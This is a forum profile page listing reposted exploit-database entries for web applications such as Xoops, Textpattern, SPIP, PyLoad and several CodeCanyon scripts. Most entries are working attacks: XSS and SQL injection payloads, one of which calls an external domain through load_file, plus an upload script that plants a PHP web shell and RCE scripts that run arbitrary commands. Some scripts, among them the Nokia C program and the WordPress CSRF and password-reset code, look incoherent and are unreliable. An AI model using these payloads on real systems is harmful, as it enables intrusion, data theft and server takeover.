Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Xoops CMS 2.5.10 - Stored Cross-Site Scripting (XSS) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Xoops CMS 2.5.10 - Stored Cross-Site Scripting (XSS) (Authenticated) # Date: 2023-06-12 # Exploit Author: tmrswrr # Vendor Homepage: https://xoops.org/ # Software https://github.com/XOOPS/XoopsCore25/releases/tag/v2.5.10 # Version: 2.5.10 # Tested : https://www.softaculous.com/apps/cms/Xoops --- Description --- 1) Login admin panel and click Image Manager , choose Add Category : https://demos5.softaculous.com/Xoopshkqdowiwqq/modules/system/admin.php?fct=images 2) Write your payload in the Category Name field and submit: Payload: <script>alert(1)</script> 3) After click multiupload , when you move the mouse to the payload name, you will see the alert button https://demos5.softaculous.com/Xoopshkqdowiwqq/modules/system/admin.php?fct=images&op=multiupload&imgcat_id=2
  2. HireHackking

    Monstra 3.0.4 - Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Monstra 3.0.4 - Stored Cross-Site Scripting (XSS) # Date: 2023-06-13 # Exploit Author: tmrswrr # Vendor Homepage: https://monstra.org/ # Software Link: https://monstra.org/monstra-3.0.4.zip # Version: 3.0.4 # Tested : https://www.softaculous.com/softaculous/demos/Monstra --- Description --- 1) Login admin panel and go to Pages: https://demos3.softaculous.com/Monstraggybvrnbr4/admin/index.php?id=pages 2) Click edit button and write your payload in the Name field: Payload: "><script>alert(1)</script> 3) After save change and will you see alert button https://demos3.softaculous.com/Monstraggybvrnbr4/
  3. HireHackking

    Online Thesis Archiving System v1.0 - Multiple-SQLi

    HireHackking posted a blog entry in Hacker Technology
    ## Exploit Title: Online Thesis Archiving System v1.0 - Multiple-SQLi ## Author: nu11secur1ty ## Date: 06.12.2023 ## Vendor: https://github.com/oretnom23 ## Software: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The password parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\t5z7nwb485tiyvqzqnv3hp1z3q9jxatyk18tvkj9.tupungerispanski.com\\ock'))+' was submitted in the password parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can dump all information from the database of this system, and then he can use it for dangerous and malicious purposes! STATUS: HIGH-CRITICAL Vulnerability [+]Payload: ```mysql --- Parameter: password (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7') OR NOT 1404=1404-- Eotr Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7') AND (SELECT 5476 FROM(SELECT COUNT(*),CONCAT(0x717a6b6b71,(SELECT (ELT(5476=5476,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sOUa Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7') AND (SELECT 6301 FROM (SELECT(SLEEP(15)))MFgI)-- HCqY --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/OTAS-v1.0) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/06/otas-php-by-oretnom23-v10-multiple-sqli.html) ## Time spend: 01:15:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
  4. HireHackking

    Groomify v1.0 - SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Groomify v1.0 - SQL Injection # Date: 2023-06-17 # Exploit Author: Ahmet Ümit BAYRAM # Vendor: https://codecanyon.net/item/groomify-barbershop-salon-spa-booking-and-ecommerce-platform/45808114# # Demo Site: https://script.bugfinder.net/groomify # Tested on: Kali Linux # CVE: N/A ### Vulnerable URL ### https://localhost/groomify/blog-search?search=payload ### Parameter & Payloads ### Parameter: search (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: search=deneme' AND (SELECT 1642 FROM (SELECT(SLEEP(5)))Xppf) AND 'rszk'='rszk
  5. HireHackking

    Textpattern CMS v4.8.8 - Stored Cross-Site Scripting (XSS) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Textpattern CMS v4.8.8 - Stored Cross-Site Scripting (XSS) (Authenticated) # Date: 2023-06-13 # Exploit Author: tmrswrr # Vendor Homepage: https://textpattern.com/ # Software Link: https://textpattern.com/file_download/118/textpattern-4.8.8.zip # Version: v4.8.8 # Tested : https://release-demo.textpattern.co/ --- Description --- 1) Login admin page , choose Content , Articles section : https://release-demo.textpattern.co/textpattern/index.php?event=article&ID=2 2) Write in Excerpt field this payload > "><script>alert(document.cookie)</script> 3) Click My Site will you see alert button https://release-demo.textpattern.co/index.php?id=2 --- Request --- POST /textpattern/index.php HTTP/2 Host: release-demo.textpattern.co Cookie: txp_login=managing-editor179%2C1673c724813dc43d06d90aff6e69616c; txp_login_public=b7cb169562managing-editor179 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://release-demo.textpattern.co/ X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------26516646042700398511941284351 Content-Length: 4690 Origin: https://release-demo.textpattern.co Dnt: 1 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="ID" 2 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="event" article -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="step" edit -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="Title" hello -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="textile_body" 1 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="Body" hello -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="textile_excerpt" 1 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="Excerpt" "><script>alert(document.cookie)</script> -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="sPosted" 1686684925 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="sLastMod" 1686685069 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="AuthorID" managing-editor179 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="LastModID" managing-editor179 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="Status" 4 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="Section" articles -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="override_form" article_listing -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="year" 2023 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="month" 06 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="day" 13 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="hour" 19 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="minute" 35 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="second" 25 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="exp_year" -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="exp_month" -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="exp_day" -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="exp_hour" -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="exp_minute" -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="exp_second" -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="sExpires" -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="Category1" hope-for-the-future -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="Category2" hope-for-the-future -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="url_title" alert1 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="description" -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="Keywords" -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="Image" -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="custom_1" -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="custom_2" -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="save" Save -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="app_mode" async -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="_txp_token" fb6da7f582d0606882462bc4ed72238e -----------------------------26516646042700398511941284351--
  6. HireHackking

    The Shop v2.5 - SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: The Shop v2.5 - SQL Injection # Date: 2023-06-17 # Exploit Author: Ahmet Ümit BAYRAM # Vendor: https://codecanyon.net/item/the-shop/34858541 # Demo Site: https://shop.activeitzone.com # Tested on: Kali Linux # CVE: N/A ### Request ### POST /api/v1/carts/add HTTP/1.1 Content-Type: application/json Accept: application/json, text/plain, */* x-requested-with: XMLHttpRequest x-xsrf-token: xjwxipuDENxaHWGfda1nUZbX1R155JZfHD5ab8L4 Referer: https://localhost Cookie: XSRF-TOKEN=LBhB7u7sgRN4hB3DB3NSgOBMLE2tGDIYWItEeJGL; the_shop_session=iGQJNeNlvRFGYZvsVowWUMDJ8nRL2xzPRXhT93h7 Content-Length: 81 Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Host: localhost Connection: Keep-alive {"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0)","temp_user_id":null} ### Parameter & Payloads ### Parameter: JSON qty ((custom) POST) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: {"variation_id":"119","qty":"(SELECT (CASE WHEN (4420=4420) THEN 'if(now()=sysdate(),sleep(6),0)' ELSE (SELECT 3816 UNION SELECT 4495) END))","temp_user_id":null} Type: time-based blind Title: MySQL > 5.0.12 OR time-based blind (heavy query) Payload: {"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0) OR 2614=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)","temp_user_id":null}
  7. HireHackking

    Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticated) # Google Dork: n/a # Date: 14/06/2023 # Exploit Author: Ramil Mustafayev # Vendor Homepage: https://github.com/projectworldsofficial # Software Link: https://github.com/projectworlds32/Art-Gallary-php/archive/master.zip # Version: 1.0 # Tested on: Windows 10, XAMPP for Windows 8.0.28 / PHP 8.0.28 # CVE : n/a # Vulnerability Description: # # Online Art Gallery Project 1.0 allows unauthenticated users to perform arbitrary file uploads via the adminHome.php page. Due to the absence of an authentication mechanism and inadequate file validation, attackers can upload malicious files, potentially leading to remote code execution and unauthorized access to the server. # Usage: python exploit.py http://example.com import requests import sys def upload_file(url, filename, file_content): files = { 'sliderpic': (filename, file_content, 'application/octet-stream') } data = { 'img_id': '', 'sliderPicSubmit': '' } url = url+"/Admin/adminHome.php" try: response = requests.post(url, files=files, data=data) except: print("[!] Exploit failed!") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python exploit.py <target_url>") sys.exit(1) target_url = sys.argv[1] file_name = "simple-backdoor.php" file_content = '<?php system($_GET["c"]);?>' upload_file(target_url, file_name, file_content) print("[+] The simple-backdoor has been uploaded.\n Check following URL: "+target_url+"/images/Slider"+file_name+"?c=whoami")
  8. HireHackking

    Jobpilot v2.61 - SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Jobpilot v2.61 - SQL Injection # Date: 2023-06-17 # Exploit Author: Ahmet Ümit BAYRAM # Vendor: https://codecanyon.net/item/jobpilot-job-portal-laravel-script/37897822 # Demo Site: https://jobpilot.templatecookie.com # Tested on: Kali Linux # CVE: N/A ----- PoC: SQLi ----- Parameter: long (GET) Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: keyword=1&lat=34.0536909&long=-118.242766&long=-118.242766) AND EXTRACTVALUE(4894,CONCAT(0x5c,0x7170766271,(SELECT (ELT(4894=4894,1))),0x71786b7171)) AND (1440=1440&lat=34.0536909&location=Los Angeles, Los Angeles County, CAL Fire Contract Counties, California, United States&category=&price_min=&price_max=&tag= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: keyword=1&lat=34.0536909&long=-118.242766&long=-118.242766) AND (SELECT 9988 FROM (SELECT(SLEEP(5)))bgbf) AND (1913=1913&lat=34.0536909&location=Los Angeles, Los Angeles County, CAL Fire Contract Counties, California, United States&category=&price_min=&price_max=&tag=
  9. HireHackking

    Symantec SiteMinder WebAgent v12.52 - Cross-site scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: Symantec SiteMinder WebAgent v12.52 - Cross-site scripting (XSS) Google Dork: N/A Date: 18-06-2023 Exploit Author: Harshit Joshi Vendor Homepage: https://community.broadcom.com/home Software Link: https://www.broadcom.com/products/identity/siteminder Version: 12.52 Tested on: Linux, Windows CVE: CVE-2023-23956 Security Advisory: https://support.broadcom.com/external/content/SecurityAdvisories/0/22221 *Description:* I am writing to report two XSS vulnerabilities (CVE-2023-23956) that I have discovered in the Symantec SiteMinder WebAgent. The vulnerability is related to the improper handling of user input and has been assigned the Common Weakness Enumeration (CWE) code CWE-79. The CVSSv3 score for this vulnerability is 5.4. Vulnerability Details: --------------------- *Impact:* This vulnerability allows an attacker to execute arbitrary JavaScript code in the context of the affected application. *Steps to Reproduce:* *First:* 1) Visit - https://domain.com/siteminderagent/forms/login.fcc?TYPE=xyz&REALMOID=123&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%22 2) After visiting the above URL, click on the "*Change Password*" button, and the popup will appear. - The *SMAGENTNAME *parameter is the source of this vulnerability. *- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="* *Second:* 1) Visit - https://domain.com/siteminderagent/forms/login.fcc?TYPE=123&TARGET=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%22 2) After visiting the above URL, click on the "*Change Password*" button, and the popup will appear. - The *TARGET *parameter is the source of this vulnerability. *- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="*
  10. HireHackking

    Diafan CMS 6.0 - Reflected Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Diafan CMS 6.0 - Reflected Cross-Site Scripting (XSS) # Exploit Author: tmrswrr / Hulya Karabag # Vendor Homepage: https://www.diafancms.com/ # Version: 6.0 # Tested on: https://demo.diafancms.com Description: 1) https://demo.diafancms.com/ Go to main page and write your payload in Search in the goods > Article field: Payload : "><script>alert(document.domain)<%2Fscript> 2) After will you see alert button : https://demo.diafancms.com/shop/?module=shop&action=search&cat_id=0&a=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&pr1=0&pr2=0
  11. HireHackking

    Student Study Center Management System v1.0 - Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Student Study Center Management System v1.0 - Stored Cross-Site Scripting (XSS) # Date of found: 12/05/2023 # Exploit Author: VIVEK CHOUDHARY @sudovivek # Version: V1.0 # Tested on: Windows 10 # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/student-study-center-management-system-using-php-and-mysql/ # CVE: CVE-2023-33580 # CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33580 Vulnerability Description - The Student Study Center Management System V1.0, developed by PHPGurukul, is susceptible to a critical security vulnerability known as Stored Cross-Site Scripting (XSS). This vulnerability enables attackers to inject malicious JavaScript code, which is then stored and executed by the application. The underlying issue lies in the system's failure to adequately sanitize and validate user-provided input within the "Admin Name" field on the Admin Profile page, thereby allowing attackers to inject arbitrary JavaScript code. Steps to Reproduce - The following steps demonstrate how to exploit the Stored XSS vulnerability in the Student Study Center Management System V1.0: 1. Visit the Student Study Center Management System V1.0 application by accessing the URL: http://localhost/student-study-center-MS-PHP/sscms/index.php. 2. Click on the "Admin" button to navigate to the admin login page. 3. Login to the Admin account using the default credentials. - Username: admin - Password: Test@123 4. Proceed to the Admin Profile page. 5. Within the "Admin Name" field, inject the following XSS payload, enclosed in brackets: {"><script>alert("XSS")</script>}. 6. Click on the "Submit" button. 7. Refresh the page, and the injected payload will be executed. As a result of successful exploitation, the injected JavaScript code will be stored in the application's database. Subsequently, whenever another user accesses the affected page, the injected code will execute, triggering an alert displaying the text "XSS." This allows the attacker to execute arbitrary code within the user's browser, potentially leading to further attacks or unauthorized actions.
  12. HireHackking

    WordPress Theme Medic v1.0.0 - Weak Password Recovery Mechanism for Forgotten Password

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Theme Medic v1.0.0 - Weak Password Recovery Mechanism for Forgotten Password # Dork: inurl:/wp-includes/class-wp-query.php # Date: 2023-06-19 # Exploit Author: Amirhossein Bahramizadeh # Category : Webapps # Vendor Homepage: https://www.templatemonster.com/wordpress-themes/medic-health-and-medical-clinic-wordpress-theme-216233.html # Version: 1.0.0 (REQUIRED) # Tested on: Windows/Linux # CVE: CVE-2020-11027 import requests from bs4 import BeautifulSoup from datetime import datetime, timedelta # Set the WordPress site URL and the user email address site_url = 'https://example.com' user_email = 'user@example.com' # Get the password reset link from the user email # You can use any email client or library to retrieve the email # In this example, we are assuming that the email is stored in a file named 'password_reset_email.html' with open('password_reset_email.html', 'r') as f: email = f.read() soup = BeautifulSoup(email, 'html.parser') reset_link = soup.find('a', href=True)['href'] print(f'Reset Link: {reset_link}') # Check if the password reset link expires upon changing the user password response = requests.get(reset_link) if response.status_code == 200: # Get the expiration date from the reset link HTML soup = BeautifulSoup(response.text, 'html.parser') expiration_date_str = soup.find('p', string=lambda s: 'Password reset link will expire on' in s).text.split('on ')[1] expiration_date = datetime.strptime(expiration_date_str, '%B %d, %Y %I:%M %p') print(f'Expiration Date: {expiration_date}') # Check if the expiration date is less than 24 hours from now if expiration_date < datetime.now() + timedelta(hours=24): print('Password reset link expires upon changing the user password.') else: print('Password reset link does not expire upon changing the user password.') else: print(f'Error fetching reset link: {response.status_code} {response.text}') exit()
  13. HireHackking

    Super Socializer 7.13.52 - Reflected XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Super Socializer 7.13.52 - Reflected XSS # Dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://www.google.com # Date: 2023-06-20 # Exploit Author: Amirhossein Bahramizadeh # Category : Webapps # Vendor Homepage: https://wordpress.org/plugins/super-socializer # Version: 7.13.52 (REQUIRED) # Tested on: Windows/Linux # CVE : CVE-2023-2779 import requests # The URL of the vulnerable AJAX endpoint url = "https://example.com/wp-admin/admin-ajax.php" # The vulnerable parameter that is not properly sanitized and escaped vulnerable_param = "<img src=x onerror=alert(document.domain)>" # The payload that exploits the vulnerability payload = {"action": "the_champ_sharing_count", "urls[" + vulnerable_param + "]": "https://www.google.com"} # Send a POST request to the vulnerable endpoint with the payload response = requests.post(url, data=payload) # Check if the payload was executed by searching for the injected script tag if "<img src=x onerror=alert(document.domain)>" in response.text: print("Vulnerability successfully exploited") else: print("Vulnerability not exploitable")
  14. HireHackking

    WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS) # Dork: inurl:~/admin/views/admin.php # Date: 2023-06-20 # Exploit Author: Amirhossein Bahramizadeh # Category : Webapps # Vendor Homepage: https://wordpress.org/plugins/wp-sticky-social # Version: 1.0.1 (REQUIRED) # Tested on: Windows/Linux # CVE : CVE-2023-3320 import requests import hashlib import time # Set the target URL url = "http://example.com/wp-admin/admin.php?page=wpss_settings" # Set the user agent string user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" # Generate the nonce value nonce = hashlib.sha256(str(time.time()).encode('utf-8')).hexdigest() # Set the data payload payload = { "wpss_nonce": nonce, "wpss_setting_1": "value_1", "wpss_setting_2": "value_2", # Add additional settings as needed } # Set the request headers headers = { "User-Agent": user_agent, "Referer": url, "Cookie": "wordpress_logged_in=1; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26uploader%3Dwp-plupload%26urlbutton%3Dfile; wp-settings-time-1=1495271983", # Add additional headers as needed } # Send the POST request response = requests.post(url, data=payload, headers=headers) # Check the response status code if response.status_code == 200: print("Request successful") else: print("Request failed")
  15. HireHackking

    PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE) # Date: 06-10-2023 # Credits: bAu @bauh0lz # Exploit Author: Gabriel Lima (0xGabe) # Vendor Homepage: https://pyload.net/ # Software Link: https://github.com/pyload/pyload # Version: 0.5.0 # Tested on: Ubuntu 20.04.6 # CVE: CVE-2023-0297 import requests, argparse parser = argparse.ArgumentParser() parser.add_argument('-u', action='store', dest='url', required=True, help='Target url.') parser.add_argument('-c', action='store', dest='cmd', required=True, help='Command to execute.') arguments = parser.parse_args() def doRequest(url): try: res = requests.get(url + '/flash/addcrypted2') if res.status_code == 200: return True else: return False except requests.exceptions.RequestException as e: print("[!] Maybe the host is offline :", e) exit() def runExploit(url, cmd): endpoint = url + '/flash/addcrypted2' if " " in cmd: validCommand = cmd.replace(" ", "%20") else: validCommand = cmd payload = 'jk=pyimport%20os;os.system("'+validCommand+'");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' test = requests.post(endpoint, headers={'Content-type': 'application/x-www-form-urlencoded'},data=payload) print('[+] The exploit has be executeded in target machine. ') def main(targetUrl, Command): print('[+] Check if target host is alive: ' + targetUrl) alive = doRequest(targetUrl) if alive == True: print("[+] Host up, let's exploit! ") runExploit(targetUrl,Command) else: print('[-] Host down! ') if(arguments.url != None and arguments.cmd != None): targetUrl = arguments.url Command = arguments.cmd main(targetUrl, Command)
  16. HireHackking

    SPIP v4.2.0 - Remote Code Execution (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/env python3 # -*- coding: utf-8 -*- # Exploit Title: SPIP v4.2.1 - Remote Code Execution (Unauthenticated) # Google Dork: inurl:"/spip.php?page=login" # Date: 19/06/2023 # Exploit Author: nuts7 (https://github.com/nuts7/CVE-2023-27372) # Vendor Homepage: https://www.spip.net/ # Software Link: https://files.spip.net/spip/archives/ # Version: < 4.2.1 (Except few fixed versions indicated in the description) # Tested on: Ubuntu 20.04.3 LTS, SPIP 4.0.0 # CVE reference : CVE-2023-27372 (coiffeur) # CVSS : 9.8 (Critical) # # Vulnerability Description: # # SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. Branches 3.2, 4.0, 4.1 and 4.2 are concerned. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1. # This PoC exploits a PHP code injection in SPIP. The vulnerability exists in the `oubli` parameter and allows an unauthenticated user to execute arbitrary commands with web user privileges. # # Usage: python3 CVE-2023-27372.py http://example.com import argparse import bs4 import html import requests def parseArgs(): parser = argparse.ArgumentParser(description="Poc of CVE-2023-27372 SPIP < 4.2.1 - Remote Code Execution by nuts7") parser.add_argument("-u", "--url", default=None, required=True, help="SPIP application base URL") parser.add_argument("-c", "--command", default=None, required=True, help="Command to execute") parser.add_argument("-v", "--verbose", default=False, action="store_true", help="Verbose mode. (default: False)") return parser.parse_args() def get_anticsrf(url): r = requests.get('%s/spip.php?page=spip_pass' % url, timeout=10) soup = bs4.BeautifulSoup(r.text, 'html.parser') csrf_input = soup.find('input', {'name': 'formulaire_action_args'}) if csrf_input: csrf_value = csrf_input['value'] if options.verbose: print("[+] Anti-CSRF token found : %s" % csrf_value) return csrf_value else: print("[-] Unable to find Anti-CSRF token") return -1 def send_payload(url, payload): data = { "page": "spip_pass", "formulaire_action": "oubli", "formulaire_action_args": csrf, "oubli": payload } r = requests.post('%s/spip.php?page=spip_pass' % url, data=data) if options.verbose: print("[+] Execute this payload : %s" % payload) return 0 if __name__ == '__main__': options = parseArgs() requests.packages.urllib3.disable_warnings() requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL' try: requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL' except AttributeError: pass csrf = get_anticsrf(url=options.url) send_payload(url=options.url, payload="s:%s:\"<?php system('%s'); ?>\";" % (20 + len(options.command), options.command))
  17. HireHackking

    Nokia ASIKA 7.13.52 - Hard-coded private key disclosure

    HireHackking posted a blog entry in Hacker Technology
    // Exploit Title: Nokia ASIKA 7.13.52 - Hard-coded private key disclosure // Date: 2023-06-20 // Exploit Author: Amirhossein Bahramizadeh // Category : Hardware // Vendor Homepage: https://www.nokia.com/about-us/security-and-privacy/product-security-advisory/cve-2023-25187/ // Version: 7.13.52 (REQUIRED) // Tested on: Windows/Linux // CVE : CVE-2023-25187 #include <stdio.h> #include <stdlib.h> #include <string.h> #include <errno.h> #include <unistd.h> #include <netinet/in.h> #include <arpa/inet.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/wait.h> #include <signal.h> // The IP address of the vulnerable device char *host = "192.168.1.1"; // The default SSH port number int port = 22; // The username and password for the BTS service user account char *username = "service_user"; char *password = "password123"; // The IP address of the attacker's machine char *attacker_ip = "10.0.0.1"; // The port number to use for the MITM attack int attacker_port = 2222; // The maximum length of a message #define MAX_LEN 1024 // Forward data between two sockets void forward_data(int sock1, int sock2) { char buffer[MAX_LEN]; ssize_t bytes_read; while ((bytes_read = read(sock1, buffer, MAX_LEN)) > 0) { write(sock2, buffer, bytes_read); } } int main() { int sock, pid1, pid2; struct sockaddr_in addr; char *argv[] = {"/usr/bin/ssh", "-l", username, "-p", "2222", "-o", "StrictHostKeyChecking=no", "-o", "UserKnownHostsFile=/dev/null", "-o", "PasswordAuthentication=no", "-o", "PubkeyAuthentication=yes", "-i", "/path/to/private/key", "-N", "-R", "2222:localhost:22", host, NULL}; // Create a new socket sock = socket(AF_INET, SOCK_STREAM, 0); // Set the address to connect to memset(&addr, 0, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_port = htons(port); inet_pton(AF_INET, host, &addr.sin_addr); // Connect to the vulnerable device if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0) { fprintf(stderr, "Error connecting to %s:%d: %s\n", host, port, strerror(errno)); exit(1); } // Send the SSH handshake write(sock, "SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.10\r\n", 42); read(sock, NULL, 0); // Send the username write(sock, username, strlen(username)); write(sock, "\r\n", 2); read(sock, NULL, 0); // Send the password write(sock, password, strlen(password)); write(sock, "\r\n", 2); // Wait for the authentication to complete sleep(1); // Start an SSH client on the attacker's machine pid1 = fork(); if (pid1 == 0) { execv("/usr/bin/ssh", argv); exit(0); } // Start an SSH server on the attacker's machine pid2 = fork(); if (pid2 == 0) { execl("/usr/sbin/sshd", "/usr/sbin/sshd", "-p", "2222", "-o", "StrictModes=no", "-o", "PasswordAuthentication=no", "-o", "PubkeyAuthentication=yes", "-o", "AuthorizedKeysFile=/dev/null", "-o", "HostKey=/path/to/private/key", NULL); exit(0); } // Wait for the SSH server to start sleep(1); // Forward data between the client and the server pid1 = fork(); if (pid1 == 0) { forward_data(sock, STDIN_FILENO); exit(0); } pid2 = fork(); if (pid2 == 0) { forward_data(STDOUT_FILENO, sock); exit(0); } // Wait for the child processes to finish waitpid(pid1, NULL, 0); waitpid(pid2, NULL, 0); // Close the socket close(sock); return 0; }
  18. HireHackking

    HiSecOS 04.0.01 - Privilege Escalation

    HireHackking posted a blog entry in Hacker Technology
